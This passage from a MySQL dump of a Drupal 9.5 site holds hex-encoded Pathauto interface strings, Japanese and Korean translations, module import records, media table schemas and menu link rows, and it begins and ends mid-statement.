(4675, 0x3c7374726f6e673e4e6f74653a3c2f7374726f6e673e207468657265206973206e6f20636f6e6669726d6174696f6e2e2042652073757265206f6620796f757220616374696f6e206265666f726520636c69636b696e6720746865202244656c65746520616c6961736573206e6f77212220627574746f6e2e3c6272202f3e596f75206d61792077616e7420746f206d616b652061206261636b7570206f662074686520646174616261736520616e642f6f722074686520706174685f616c69617320616e6420706174685f616c6961735f7265766973696f6e207461626c6573207072696f7220746f207573696e67207468697320666561747572652e, '', '10.6.15'),
(4676, 0x416c6c20616c6961736573, '', '10.6.15'),
(4677, 0x44656c65746520616c6c20616c69617365732e204e756d626572206f6620616c69617365732077686963682077696c6c2062652064656c657465643a2025636f756e742e, '', '10.6.15'),
(4678, 0x44656c65746520616c696173657320666f7220616c6c20406c6162656c2e204e756d626572206f6620616c69617365732077686963682077696c6c2062652064656c657465643a2025636f756e742e, '', '10.6.15'),
(4679, 0x43686f6f736520616c696173657320746f2064656c657465, '', '10.6.15'),
(4680, 0x4f6e6c792064656c657465206175746f6d61746963616c6c792067656e65726174656420616c6961736573, '', '10.6.15'),
(4681, 0x5768656e20636865636b65642c20616c69617365732077686963682068617665206265656e206d616e75616c6c792073657420617265206e6f742061666665637465642062792074686973206d6173732d64656c6574696f6e2e, '', '10.6.15'),
(4682, 0x44656c657465206f7074696f6e73, '', '10.6.15'),
(4683, 0x44656c65746520616c6961736573206e6f7721, '', '10.6.15'),
(4684, 0x42756c6b2064656c6574696e672055524c20616c6961736573, '', '10.6.15'),
(4685, 0x416c6c206f6620796f7572206175746f6d61746963616c6c792067656e657261746564207061746820616c69617365732068617665206265656e2064656c657465642e, '', '10.6.15'),
(4686, 0x53656c65637420746865207479706573206f6620706174687320666f7220776869636820746f2067656e65726174652055524c20616c6961736573, '', '10.6.15'),
(4687, 0x47656e657261746520612055524c20616c69617320666f7220756e2d616c6961736564207061746873206f6e6c79, '', '10.6.15'),
(4688, 0x557064617465207468652055524c20616c69617320666f7220706174687320686176696e6720616e206f6c642055524c20616c696173, '', '10.6.15'),
(4689, 0x526567656e65726174652055524c20616c696173657320666f7220616c6c207061746873, '', '10.6.15'),
(4690, 0x53656c6563742077686963682055524c20616c696173657320746f2067656e6572617465, '', '10.6.15'),
(4691, 0x42756c6b2067656e65726174696f6e2063616e206265207573656420746f2067656e65726174652055524c20616c696173657320666f72206974656d7320746861742063757272656e746c792068617665206e6f20616c69617365732e2054686973206973207479706963616c6c792075736564207768656e20696e7374616c6c696e6720506174686175746f206f6e20612073697465207468617420686173206578697374696e6720756e2d616c696173656420636f6e74656e742074686174206e6565647320746f20626520616c696173656420696e2062756c6b2e, '', '10.6.15'),
(4692, 0x49742063616e20616c736f206265207573656420746f20726567656e65726174652055524c20616c696173657320666f72206974656d732074686174206861766520616e206f6c6420616c69617320616e6420666f722077686963682074686520506174686175746f207061747465726e20686173206265656e206368616e6765642e, '', '10.6.15'),
(4693, 0x4e6f7465207468617420746869732077696c6c206f6e6c7920616666656374206974656d732077686963682061726520636f6e6669677572656420746f20686176652074686569722055524c20616c696173206175746f6d61746963616c6c79207365742e204974656d732077686f73652055524c20616c696173206973206d616e75616c6c792073657420617265206e6f742061666665637465642e, '', '10.6.15'),
(4694, 0x42756c6b207570646174696e672055524c20616c6961736573, '', '10.6.15'),
(4695, 0x4e6f206e65772055524c20616c696173657320746f2067656e65726174652e, '', '10.6.15'),
(4696, 0x50726f6365737365642040636f756e74206f662040746f74616c20616c696173657320666f7220256c6162656c2e, '', '10.6.15'),
(4697, 0x47656e65726174656420312055524c20616c6961732e0347656e6572617465642040636f756e742055524c20616c69617365732e, '', '10.6.15');

-- --------------------------------------------------------

--
-- Table structure for table `locales_target`
--

CREATE TABLE `locales_target` (
  `lid` int NOT NULL DEFAULT '0' COMMENT 'Source string ID. References "locales_source".lid.',
  `translation` blob NOT NULL COMMENT 'Translation string value in this language.',
  `language` varchar(12) CHARACTER SET ascii COLLATE ascii_general_ci NOT NULL DEFAULT '' COMMENT 'Language code. References "language".langcode.',
  `customized` int NOT NULL DEFAULT '0' COMMENT 'Boolean indicating whether the translation is custom to this site.'
) ENGINE=InnoDB DEFAULT CHARSET=utf8mb3 COMMENT='Stores translated versions of strings.';

--
-- Dumping data for table `locales_target`
--

INSERT INTO `locales_target` (`lid`, `translation`, `language`, `customized`) VALUES
(37, '', 'ja', 1),
(57, 0xe38387e38395e382a9e383abe38388, 'ja', 0),
(59, 0xe382a2e382afe382b7e383a7e383b3, 'ja', 0),
(83, 0xe7b7a8e99b86, 'ja', 0),
(85, 0xe5898ae999a4, 'ja', 0),
(361, 0xe38395e382a3e383bce383abe38389, 'ja', 0),
(394, 0xe382b9e383a9e382a4e38389e382b7e383a7e383bc, 'ja', 0),
(395, 0xe5898de381b8, 'ja', 0),
(396, 0xe6aca1e381b8, 'ja', 0),
(397, 0xe38388e38383e38397, 'ja', 0),
(398, 0xe38393e383a5e383bc, 'ja', 0),
(399, 0xe38386e382ade382b9e38388, 'ja', 0),
(400, 0xe3839ce38388e383a0, 'ja', 0),
(401, 0xe4b8a6e381b3e9a086, 'ja', 0),
(402, 0xe383a9e383b3e38380e383a0, 'ja', 0),
(403, 0xe981b7e7a7bb, 'ja', 0),
(404, 0xe382b9e382bfe382a4e383ab, 'ja', 0),
(405, 0xe5868de9968b, 'ja', 0),
(406, 0xe8a9b3e7b4b0e382aae38397e382b7e383a7e383b3, 'ja', 0),
(407, 0xe382b9e382ade383b3, 'ja', 0),
(408, 0xe3839ae383bce382b8e383a3e383bc, 'ja', 0),
(409, 0xe3839be38390e383bce69982e381abe4b880e69982e5819ce6ada2, 'ja', 0),
(410, 0xe382a2e38390e382a6e38388, 'ja', 0),
(411, 0xe58ab9e69e9c, 'ja', 0),
(412, 0xe382b9e38394e383bce38389, 'ja', 0),
(413, 0xe381ae, 'ja', 0),
(414, 0xe591a8e69c9f, 'ja', 0),
(415, 0x566965777320536c69646573686f77e381abe59b9ee8bba2e382b9e383a9e382a4e38389e382b7e383a7e383bce38292e4bdbfe38184e381bee38199e38082, 'ja', 0),
(739, 0xe8bfbde58aa0, 'ja', 0),
(774, 0xe7bfbbe8a8b3e69c9fe99990e58887e3828c, 'ja', 0),
(793, 0xe7bfbbe8a8b3e382b9e38386e383bce382bfe382b9, 'ja', 0),
(869, 0xe580a4, 'ja', 0),
(939, 0x2d20e38199e381b9e381a6202d, 'ja', 0),
(951, 0xe5a49ae8a880e8aa9e, 'ja', 0),
(1106, 0xe69caae7bfbbe8a8b3, 'ja', 0),
(1124, 0xe7bfbbe8a8b3e6b888, 'ja', 0),
(1125, 0xe382abe383a9e383a0, 'ja', 0),
(1126, 0xe38395e382a9e383bce3839ee38383e382bfe383bc, 'ja', 0),
(1127, 0xe382b7e382b9e38386e383a0e58685e983a8e5908de7a7b0, 'ja', 0),
(1128, 0xe7bfbbe8a8b3e69bb4e696b0e697a5e69982, 'ja', 0),
(57, 0xeab8b0ebb3b8eab092, 'ko', 0),
(59, 0xec95a1ec8598, 'ko', 0),
(83, 0xed8eb8eca791ed9598eab8b0, 'ko', 0),
(85, 0xec82adeca09ced9598eab8b0, 'ko', 0),
(361, 0xed9584eb939c, 'ko', 0),
(394, 0xec8aaceb9dbcec9db4eb939c20ec87bc, 'ko', 0),
(395, 0xec9db4eca084, 'ko', 0),
(396, 0xeb8ba4ec9d8c, 'ko', 0),
(397, 0xec9c84, 'ko', 0),
(398, 0xebb7b0, 'ko', 0),
(399, 0xed858dec8aa4ed8ab8, 'ko', 0),
(400, 0xec9584eb9e98, 'ko', 0),
(401, 0xeca095eba0ac20ec889cec849c, 'ko', 0),
(402, 0xebacb4ec9e91ec9c84, 'ko', 0),
(403, 0xec8381ed839c20eca084ec9db4, 'ko', 0),
(404, 0xec8aa4ed8380ec9dbc, 'ko', 0),
(408, 0xecaabd20ebb288ed98b8, 'ko', 0),
(410, 0xec868ceab09c, 'ko', 0),
(411, 0xed9aa8eab3bc, 'ko', 0),
(413, 0xec9d98, 'ko', 0),
(416, 0xec9c84eca0af, 'ko', 0),
(739, 0xecb694eab080, 'ko', 0),
(774, 0xec98a4eb9e98eb909c20ebb288ec97adec9e85eb8b88eb8ba42e, 'ko', 0),
(793, 0xebb288ec97ad20ec8381ed839c, 'ko', 0),
(869, 0xeab092, 'ko', 0),
(939, 0x2d20ebaaa8eb9190202d, 'ko', 0),
(951, 0xeb8ba4eab5adec96b4, 'ko', 0),
(1106, 0xebb288ec97adec9db420eb9098eca78020ec958aec9d8c, 'ko', 0),
(1124, 0xebb288ec97adeb90a8, 'ko', 0),
(1125, 0xeb8ba8, 'ko', 0),
(1126, 0xed8faceba7b7ed84b0, 'ko', 0),
(1127, 0xeab8b0eab384ebaa85, 'ko', 0),
(1128, 0xebb288ec97ad20ebb380eab2bd20ec8b9ceab084, 'ko', 0);

-- --------------------------------------------------------

--
-- Table structure for table `locale_file`
--

CREATE TABLE `locale_file` (
  `project` varchar(255) CHARACTER SET ascii COLLATE ascii_general_ci NOT NULL DEFAULT '' COMMENT 'A unique short name to identify the project the file belongs to.',
  `langcode` varchar(12) CHARACTER SET ascii COLLATE ascii_general_ci NOT NULL DEFAULT '' COMMENT 'Language code of this translation. References "language".langcode.',
  `filename` varchar(255) NOT NULL DEFAULT '' COMMENT 'Filename of the imported file.',
  `version` varchar(128) NOT NULL DEFAULT '' COMMENT 'Version tag of the imported file.',
  `uri` varchar(255) NOT NULL DEFAULT '' COMMENT 'URI of the remote file, the resulting local file or the locally imported file.',
  `timestamp` bigint DEFAULT '0' COMMENT 'Unix timestamp of the imported file.',
  `last_checked` bigint DEFAULT '0' COMMENT 'Unix timestamp of the last time this translation was confirmed to be the most recent release available.'
) ENGINE=InnoDB DEFAULT CHARSET=utf8mb3 COMMENT='File import status information for interface translation…';

--
-- Dumping data for table `locale_file`
--

INSERT INTO `locale_file` (`project`, `langcode`, `filename`, `version`, `uri`, `timestamp`, `last_checked`) VALUES
('adaptivetheme', 'ja', '', '8.x-5.1', '', 0, 0),
('adaptivetheme', 'ko', '', '8.x-5.1', '', 0, 0),
('admin_toolbar', 'ja', '', '3.4.1', '', 0, 0),
('admin_toolbar', 'ko', '', '3.4.1', '', 0, 0),
('at_tool', 'ja', '', '2.0.3', '', 0, 0),
('at_tool', 'ko', '', '2.0.3', '', 0, 0),
('captcha', 'ja', '', '8.x-1.10', '', 0, 0),
('captcha', 'ko', '', '8.x-1.10', '', 0, 0),
('drupal', 'ja', '', '9.5.9', '', 0, 0),
('drupal', 'ko', '', '9.5.9', '', 0, 0),
('lang_dropdown', 'ja', '', '8.x-2.1', '', 0, 0),
('lang_dropdown', 'ko', '', '8.x-2.1', '', 0, 0),
('pathauto', 'ja', '', '8.x-1.11', '', 0, 0),
('pathauto', 'ko', '', '8.x-1.11', '', 0, 0),
('token', 'ja', '', '8.x-1.12', '', 0, 0),
('token', 'ko', '', '8.x-1.12', '', 0, 0),
('translation_views', 'ja', '', '8.x-1.0-alpha11', '', 1688382985, 1688382984),
('translation_views', 'ko', '', '8.x-1.0-alpha11', '', 1688382985, 1688382984),
('views_slideshow', 'ja', '', '5.0.0', '', 1688381561, 1688381561),
('views_slideshow', 'ko', '', '5.0.0', '', 1688381562, 1688381563),
('we_megamenu', 'ja', '', '8.x-1.13', '', 0, 0),
('we_megamenu', 'ko', '', '8.x-1.13', '', 0, 0);

-- --------------------------------------------------------

--
-- Table structure for table `media`
--

CREATE TABLE `media` (
  `mid` int UNSIGNED NOT NULL,
  `vid` int UNSIGNED DEFAULT NULL,
  `bundle` varchar(32) CHARACTER SET ascii COLLATE ascii_general_ci NOT NULL COMMENT 'The ID of the target entity.',
  `uuid` varchar(128) CHARACTER SET ascii COLLATE ascii_general_ci NOT NULL,
  `langcode` varchar(12) CHARACTER SET ascii COLLATE ascii_general_ci NOT NULL
) ENGINE=InnoDB DEFAULT CHARSET=utf8mb3 COMMENT='The base table for media entities.';

-- --------------------------------------------------------

--
-- Table structure for table `media_field_data`
--

CREATE TABLE `media_field_data` (
  `mid` int UNSIGNED NOT NULL,
  `vid` int UNSIGNED NOT NULL,
  `bundle` varchar(32) CHARACTER SET ascii COLLATE ascii_general_ci NOT NULL COMMENT 'The ID of the target entity.',
  `langcode` varchar(12) CHARACTER SET ascii COLLATE ascii_general_ci NOT NULL,
  `status` tinyint NOT NULL,
  `uid` int UNSIGNED NOT NULL COMMENT 'The ID of the target entity.',
  `name` varchar(255) DEFAULT NULL,
  `thumbnail__target_id` int UNSIGNED DEFAULT NULL COMMENT 'The ID of the file entity.',
  `thumbnail__alt` varchar(512) DEFAULT NULL COMMENT 'Alternative image text, for the image''s ''alt'' attribute.',
  `thumbnail__title` varchar(1024) DEFAULT NULL COMMENT 'Image title text, for the image''s ''title'' attribute.',
  `thumbnail__width` int UNSIGNED DEFAULT NULL COMMENT 'The width of the image in pixels.',
  `thumbnail__height` int UNSIGNED DEFAULT NULL COMMENT 'The height of the image in pixels.',
  `created` int DEFAULT NULL,
  `changed` int DEFAULT NULL,
  `default_langcode` tinyint NOT NULL,
  `revision_translation_affected` tinyint DEFAULT NULL
) ENGINE=InnoDB DEFAULT CHARSET=utf8mb3 COMMENT='The data table for media entities.';

-- --------------------------------------------------------

--
-- Table structure for table `media_field_revision`
--

CREATE TABLE `media_field_revision` (
  `mid` int UNSIGNED NOT NULL,
  `vid` int UNSIGNED NOT NULL,
  `langcode` varchar(12) CHARACTER SET ascii COLLATE ascii_general_ci NOT NULL,
  `status` tinyint NOT NULL,
  `uid` int UNSIGNED NOT NULL COMMENT 'The ID of the target entity.',
  `name` varchar(255) DEFAULT NULL,
  `thumbnail__target_id` int UNSIGNED DEFAULT NULL COMMENT 'The ID of the file entity.',
  `thumbnail__alt` varchar(512) DEFAULT NULL COMMENT 'Alternative image text, for the image''s ''alt'' attribute.',
  `thumbnail__title` varchar(1024) DEFAULT NULL COMMENT 'Image title text, for the image''s ''title'' attribute.',
  `thumbnail__width` int UNSIGNED DEFAULT NULL COMMENT 'The width of the image in pixels.',
  `thumbnail__height` int UNSIGNED DEFAULT NULL COMMENT 'The height of the image in pixels.',
  `created` int DEFAULT NULL,
  `changed` int DEFAULT NULL,
  `default_langcode` tinyint NOT NULL,
  `revision_translation_affected` tinyint DEFAULT NULL
) ENGINE=InnoDB DEFAULT CHARSET=utf8mb3 COMMENT='The revision data table for media entities.';

-- --------------------------------------------------------

--
-- Table structure for table `media_revision`
--

CREATE TABLE `media_revision` (
  `mid` int UNSIGNED NOT NULL,
  `vid` int UNSIGNED NOT NULL,
  `langcode` varchar(12) CHARACTER SET ascii COLLATE ascii_general_ci NOT NULL,
  `revision_user` int UNSIGNED DEFAULT NULL COMMENT 'The ID of the target entity.',
  `revision_created` int DEFAULT NULL,
  `revision_log_message` longtext,
  `revision_default` tinyint DEFAULT NULL
) ENGINE=InnoDB DEFAULT CHARSET=utf8mb3 COMMENT='The revision table for media entities.';

-- --------------------------------------------------------

--
-- Table structure for table `media_revision__field_media_audio_file`
--

CREATE TABLE `media_revision__field_media_audio_file` (
  `bundle` varchar(128) CHARACTER SET ascii COLLATE ascii_general_ci NOT NULL DEFAULT '' COMMENT 'The field instance bundle to which this row belongs, used when deleting a field instance',
  `deleted` tinyint NOT NULL DEFAULT '0' COMMENT 'A boolean indicating whether this data item has been deleted',
  `entity_id` int UNSIGNED NOT NULL COMMENT 'The entity id this data is attached to',
  `revision_id` int UNSIGNED NOT NULL COMMENT 'The entity revision id this data is attached to',
  `langcode` varchar(32) CHARACTER SET ascii COLLATE ascii_general_ci NOT NULL DEFAULT '' COMMENT 'The language code for this data item.',
  `delta` int UNSIGNED NOT NULL COMMENT 'The sequence number for this data item, used for multi-value fields',
  `field_media_audio_file_target_id` int UNSIGNED NOT NULL COMMENT 'The ID of the file entity.',
  `field_media_audio_file_display` tinyint UNSIGNED DEFAULT '1' COMMENT 'Flag to control whether this file should be displayed when viewing content.',
  `field_media_audio_file_description` text COMMENT 'A description of the file.'
) ENGINE=InnoDB DEFAULT CHARSET=utf8mb3 COMMENT='Revision archive storage for media field field_media_audio…';

-- --------------------------------------------------------

--
-- Table structure for table `media_revision__field_media_document`
--

CREATE TABLE `media_revision__field_media_document` (
  `bundle` varchar(128) CHARACTER SET ascii COLLATE ascii_general_ci NOT NULL DEFAULT '' COMMENT 'The field instance bundle to which this row belongs, used when deleting a field instance',
  `deleted` tinyint NOT NULL DEFAULT '0' COMMENT 'A boolean indicating whether this data item has been deleted',
  `entity_id` int UNSIGNED NOT NULL COMMENT 'The entity id this data is attached to',
  `revision_id` int UNSIGNED NOT NULL COMMENT 'The entity revision id this data is attached to',
  `langcode` varchar(32) CHARACTER SET ascii COLLATE ascii_general_ci NOT NULL DEFAULT '' COMMENT 'The language code for this data item.',
  `delta` int UNSIGNED NOT NULL COMMENT 'The sequence number for this data item, used for multi-value fields',
  `field_media_document_target_id` int UNSIGNED NOT NULL COMMENT 'The ID of the file entity.',
  `field_media_document_display` tinyint UNSIGNED DEFAULT '1' COMMENT 'Flag to control whether this file should be displayed when viewing content.',
  `field_media_document_description` text COMMENT 'A description of the file.'
) ENGINE=InnoDB DEFAULT CHARSET=utf8mb3 COMMENT='Revision archive storage for media field field_media…';

-- --------------------------------------------------------

--
-- Table structure for table `media_revision__field_media_image`
--

CREATE TABLE `media_revision__field_media_image` (
  `bundle` varchar(128) CHARACTER SET ascii COLLATE ascii_general_ci NOT NULL DEFAULT '' COMMENT 'The field instance bundle to which this row belongs, used when deleting a field instance',
  `deleted` tinyint NOT NULL DEFAULT '0' COMMENT 'A boolean indicating whether this data item has been deleted',
  `entity_id` int UNSIGNED NOT NULL COMMENT 'The entity id this data is attached to',
  `revision_id` int UNSIGNED NOT NULL COMMENT 'The entity revision id this data is attached to',
  `langcode` varchar(32) CHARACTER SET ascii COLLATE ascii_general_ci NOT NULL DEFAULT '' COMMENT 'The language code for this data item.',
  `delta` int UNSIGNED NOT NULL COMMENT 'The sequence number for this data item, used for multi-value fields',
  `field_media_image_target_id` int UNSIGNED NOT NULL COMMENT 'The ID of the file entity.',
  `field_media_image_alt` varchar(512) DEFAULT NULL COMMENT 'Alternative image text, for the image''s ''alt'' attribute.',
  `field_media_image_title` varchar(1024) DEFAULT NULL COMMENT 'Image title text, for the image''s ''title'' attribute.',
  `field_media_image_width` int UNSIGNED DEFAULT NULL COMMENT 'The width of the image in pixels.',
  `field_media_image_height` int UNSIGNED DEFAULT NULL COMMENT 'The height of the image in pixels.'
) ENGINE=InnoDB DEFAULT CHARSET=utf8mb3 COMMENT='Revision archive storage for media field field_media_image.';

-- --------------------------------------------------------

--
-- Table structure for table `media_revision__field_media_oembed_video`
--

CREATE TABLE `media_revision__field_media_oembed_video` (
  `bundle` varchar(128) CHARACTER SET ascii COLLATE ascii_general_ci NOT NULL DEFAULT '' COMMENT 'The field instance bundle to which this row belongs, used when deleting a field instance',
  `deleted` tinyint NOT NULL DEFAULT '0' COMMENT 'A boolean indicating whether this data item has been deleted',
  `entity_id` int UNSIGNED NOT NULL COMMENT 'The entity id this data is attached to',
  `revision_id` int UNSIGNED NOT NULL COMMENT 'The entity revision id this data is attached to',
  `langcode` varchar(32) CHARACTER SET ascii COLLATE ascii_general_ci NOT NULL DEFAULT '' COMMENT 'The language code for this data item.',
  `delta` int UNSIGNED NOT NULL COMMENT 'The sequence number for this data item, used for multi-value fields',
  `field_media_oembed_video_value` varchar(255) NOT NULL
) ENGINE=InnoDB DEFAULT CHARSET=utf8mb3 COMMENT='Revision archive storage for media field field_media_oembed…';

-- --------------------------------------------------------

--
-- Table structure for table `media_revision__field_media_video_file`
--

CREATE TABLE `media_revision__field_media_video_file` (
  `bundle` varchar(128) CHARACTER SET ascii COLLATE ascii_general_ci NOT NULL DEFAULT '' COMMENT 'The field instance bundle to which this row belongs, used when deleting a field instance',
  `deleted` tinyint NOT NULL DEFAULT '0' COMMENT 'A boolean indicating whether this data item has been deleted',
  `entity_id` int UNSIGNED NOT NULL COMMENT 'The entity id this data is attached to',
  `revision_id` int UNSIGNED NOT NULL COMMENT 'The entity revision id this data is attached to',
  `langcode` varchar(32) CHARACTER SET ascii COLLATE ascii_general_ci NOT NULL DEFAULT '' COMMENT 'The language code for this data item.',
  `delta` int UNSIGNED NOT NULL COMMENT 'The sequence number for this data item, used for multi-value fields',
  `field_media_video_file_target_id` int UNSIGNED NOT NULL COMMENT 'The ID of the file entity.',
  `field_media_video_file_display` tinyint UNSIGNED DEFAULT '1' COMMENT 'Flag to control whether this file should be displayed when viewing content.',
  `field_media_video_file_description` text COMMENT 'A description of the file.'
) ENGINE=InnoDB DEFAULT CHARSET=utf8mb3 COMMENT='Revision archive storage for media field field_media_video…';

-- --------------------------------------------------------

--
-- Table structure for table `media__field_media_audio_file`
--

CREATE TABLE `media__field_media_audio_file` (
  `bundle` varchar(128) CHARACTER SET ascii COLLATE ascii_general_ci NOT NULL DEFAULT '' COMMENT 'The field instance bundle to which this row belongs, used when deleting a field instance',
  `deleted` tinyint NOT NULL DEFAULT '0' COMMENT 'A boolean indicating whether this data item has been deleted',
  `entity_id` int UNSIGNED NOT NULL COMMENT 'The entity id this data is attached to',
  `revision_id` int UNSIGNED NOT NULL COMMENT 'The entity revision id this data is attached to',
  `langcode` varchar(32) CHARACTER SET ascii COLLATE ascii_general_ci NOT NULL DEFAULT '' COMMENT 'The language code for this data item.',
  `delta` int UNSIGNED NOT NULL COMMENT 'The sequence number for this data item, used for multi-value fields',
  `field_media_audio_file_target_id` int UNSIGNED NOT NULL COMMENT 'The ID of the file entity.',
  `field_media_audio_file_display` tinyint UNSIGNED DEFAULT '1' COMMENT 'Flag to control whether this file should be displayed when viewing content.',
  `field_media_audio_file_description` text COMMENT 'A description of the file.'
) ENGINE=InnoDB DEFAULT CHARSET=utf8mb3 COMMENT='Data storage for media field field_media_audio_file.';

-- --------------------------------------------------------

--
-- Table structure for table `media__field_media_document`
--

CREATE TABLE `media__field_media_document` (
  `bundle` varchar(128) CHARACTER SET ascii COLLATE ascii_general_ci NOT NULL DEFAULT '' COMMENT 'The field instance bundle to which this row belongs, used when deleting a field instance',
  `deleted` tinyint NOT NULL DEFAULT '0' COMMENT 'A boolean indicating whether this data item has been deleted',
  `entity_id` int UNSIGNED NOT NULL COMMENT 'The entity id this data is attached to',
  `revision_id` int UNSIGNED NOT NULL COMMENT 'The entity revision id this data is attached to',
  `langcode` varchar(32) CHARACTER SET ascii COLLATE ascii_general_ci NOT NULL DEFAULT '' COMMENT 'The language code for this data item.',
  `delta` int UNSIGNED NOT NULL COMMENT 'The sequence number for this data item, used for multi-value fields',
  `field_media_document_target_id` int UNSIGNED NOT NULL COMMENT 'The ID of the file entity.',
  `field_media_document_display` tinyint UNSIGNED DEFAULT '1' COMMENT 'Flag to control whether this file should be displayed when viewing content.',
  `field_media_document_description` text COMMENT 'A description of the file.'
) ENGINE=InnoDB DEFAULT CHARSET=utf8mb3 COMMENT='Data storage for media field field_media_document.';

-- --------------------------------------------------------

--
-- Table structure for table `media__field_media_image`
--

CREATE TABLE `media__field_media_image` (
  `bundle` varchar(128) CHARACTER SET ascii COLLATE ascii_general_ci NOT NULL DEFAULT '' COMMENT 'The field instance bundle to which this row belongs, used when deleting a field instance',
  `deleted` tinyint NOT NULL DEFAULT '0' COMMENT 'A boolean indicating whether this data item has been deleted',
  `entity_id` int UNSIGNED NOT NULL COMMENT 'The entity id this data is attached to',
  `revision_id` int UNSIGNED NOT NULL COMMENT 'The entity revision id this data is attached to',
  `langcode` varchar(32) CHARACTER SET ascii COLLATE ascii_general_ci NOT NULL DEFAULT '' COMMENT 'The language code for this data item.',
  `delta` int UNSIGNED NOT NULL COMMENT 'The sequence number for this data item, used for multi-value fields',
  `field_media_image_target_id` int UNSIGNED NOT NULL COMMENT 'The ID of the file entity.',
  `field_media_image_alt` varchar(512) DEFAULT NULL COMMENT 'Alternative image text, for the image''s ''alt'' attribute.',
  `field_media_image_title` varchar(1024) DEFAULT NULL COMMENT 'Image title text, for the image''s ''title'' attribute.',
  `field_media_image_width` int UNSIGNED DEFAULT NULL COMMENT 'The width of the image in pixels.',
  `field_media_image_height` int UNSIGNED DEFAULT NULL COMMENT 'The height of the image in pixels.'
) ENGINE=InnoDB DEFAULT CHARSET=utf8mb3 COMMENT='Data storage for media field field_media_image.';

-- --------------------------------------------------------

--
-- Table structure for table `media__field_media_oembed_video`
--

CREATE TABLE `media__field_media_oembed_video` (
  `bundle` varchar(128) CHARACTER SET ascii COLLATE ascii_general_ci NOT NULL DEFAULT '' COMMENT 'The field instance bundle to which this row belongs, used when deleting a field instance',
  `deleted` tinyint NOT NULL DEFAULT '0' COMMENT 'A boolean indicating whether this data item has been deleted',
  `entity_id` int UNSIGNED NOT NULL COMMENT 'The entity id this data is attached to',
  `revision_id` int UNSIGNED NOT NULL COMMENT 'The entity revision id this data is attached to',
  `langcode` varchar(32) CHARACTER SET ascii COLLATE ascii_general_ci NOT NULL DEFAULT '' COMMENT 'The language code for this data item.',
  `delta` int UNSIGNED NOT NULL COMMENT 'The sequence number for this data item, used for multi-value fields',
  `field_media_oembed_video_value` varchar(255) NOT NULL
) ENGINE=InnoDB DEFAULT CHARSET=utf8mb3 COMMENT='Data storage for media field field_media_oembed_video.';

-- --------------------------------------------------------

--
-- Table structure for table `media__field_media_video_file`
--

CREATE TABLE `media__field_media_video_file` (
  `bundle` varchar(128) CHARACTER SET ascii COLLATE ascii_general_ci NOT NULL DEFAULT '' COMMENT 'The field instance bundle to which this row belongs, used when deleting a field instance',
  `deleted` tinyint NOT NULL DEFAULT '0' COMMENT 'A boolean indicating whether this data item has been deleted',
  `entity_id` int UNSIGNED NOT NULL COMMENT 'The entity id this data is attached to',
  `revision_id` int UNSIGNED NOT NULL COMMENT 'The entity revision id this data is attached to',
  `langcode` varchar(32) CHARACTER SET ascii COLLATE ascii_general_ci NOT NULL DEFAULT '' COMMENT 'The language code for this data item.',
  `delta` int UNSIGNED NOT NULL COMMENT 'The sequence number for this data item, used for multi-value fields',
  `field_media_video_file_target_id` int UNSIGNED NOT NULL COMMENT 'The ID of the file entity.',
  `field_media_video_file_display` tinyint UNSIGNED DEFAULT '1' COMMENT 'Flag to control whether this file should be displayed when viewing content.',
  `field_media_video_file_description` text COMMENT 'A description of the file.'
) ENGINE=InnoDB DEFAULT CHARSET=utf8mb3 COMMENT='Data storage for media field field_media_video_file.';

-- --------------------------------------------------------

--
-- Table structure for table `menu_link_content`
--

CREATE TABLE `menu_link_content` (
  `id` int UNSIGNED NOT NULL,
  `revision_id` int UNSIGNED DEFAULT NULL,
  `bundle` varchar(32) CHARACTER SET ascii COLLATE ascii_general_ci NOT NULL,
  `uuid` varchar(128) CHARACTER SET ascii COLLATE ascii_general_ci NOT NULL,
  `langcode` varchar(12) CHARACTER SET ascii COLLATE ascii_general_ci NOT NULL
) ENGINE=InnoDB DEFAULT CHARSET=utf8mb3 COMMENT='The base table for menu_link_content entities.';

--
-- Dumping data for table `menu_link_content`
--

INSERT INTO `menu_link_content` (`id`, `revision_id`, `bundle`, `uuid`, `langcode`) VALUES
(1, 1, 'menu_link_content', '8d1e32fe-2b56-44b2-a354-f0328833fc26', 'en'),
(3, 3, 'menu_link_content', '2c1fc4fa-d805-47d6-bcdb-c2e31674f1fd', 'en'),
(4, 4, 'menu_link_content', 'feefe983-d4d7-413d-b359-4d5f9649c0a4', 'en'),
(5, 5, 'menu_link_content', '08138e1b-68c5-4bc9-bb62-e0fbd4e1a07f', 'en'),
(6, 6, 'menu_link_content', '3cb23068-7e7e-44ef-9db2-b0dc9d43d379', 'en'),
(7, 7, 'menu_link_content', '20767e32-de2b-41e9-83e9-2bd0d39d9f9a', 'en'),
(8, 8, 'menu_link_content', '73e0e9b4-9e96-45aa-83d2-94e731e38630', 'en'),
(9, 9, 'menu_link_content', '72fe5b8c-23a4-4c6e-bb34-d644686ff24a', 'en'),
(10, 10, 'menu_link_content', 'f4f34d05-545b-4755-a5c5-934ebbe95d41', 'ja'),
(11, 11, 'menu_link_content', '6bec1422-63fe-47ba-940d-fc00560c2bbe', 'en'),
(12, 12, 'menu_link_content', '05809300-6342-4573-88ed-bcb2f43777ba', 'en');

-- --------------------------------------------------------

--
-- Table structure for table `menu_link_content_data`
--

CREATE TABLE `menu_link_content_data` (
  `id` int UNSIGNED NOT NULL,
  `revision_id` int UNSIGNED NOT NULL,
  `bundle` varchar(32) CHARACTER SET ascii COLLATE ascii_general_ci NOT NULL,
  `langcode` varchar(12) CHARACTER SET ascii COLLATE ascii_general_ci NOT NULL,
  `enabled` tinyint NOT NULL,
  `title` varchar(255) DEFAULT NULL,
  `description` varchar(255) DEFAULT NULL,
  `menu_name` varchar(255) CHARACTER SET ascii COLLATE ascii_general_ci DEFAULT NULL,
  `link__uri` varchar(2048) DEFAULT NULL COMMENT 'The URI of the link.',
  `link__title` varchar(255) DEFAULT NULL COMMENT 'The link text.',
  `link__options` longblob COMMENT 'Serialized array of options for the link.',
  `external` tinyint DEFAULT NULL,
  `rediscover` tinyint DEFAULT NULL,
  `weight` int DEFAULT NULL,
  `expanded` tinyint DEFAULT NULL,
  `parent` varchar(255) DEFAULT NULL,
  `changed` int DEFAULT NULL,
  `default_langcode` tinyint NOT NULL,
  `revision_translation_affected` tinyint DEFAULT NULL,
  `content_translation_source` varchar(12) CHARACTER SET ascii COLLATE ascii_general_ci DEFAULT NULL,
  `content_translation_outdated` tinyint DEFAULT NULL,
  `content_translation_uid` int UNSIGNED DEFAULT NULL COMMENT 'The ID of the target entity.',
  `content_translation_status` tinyint DEFAULT NULL,
  `content_translation_created` int DEFAULT NULL
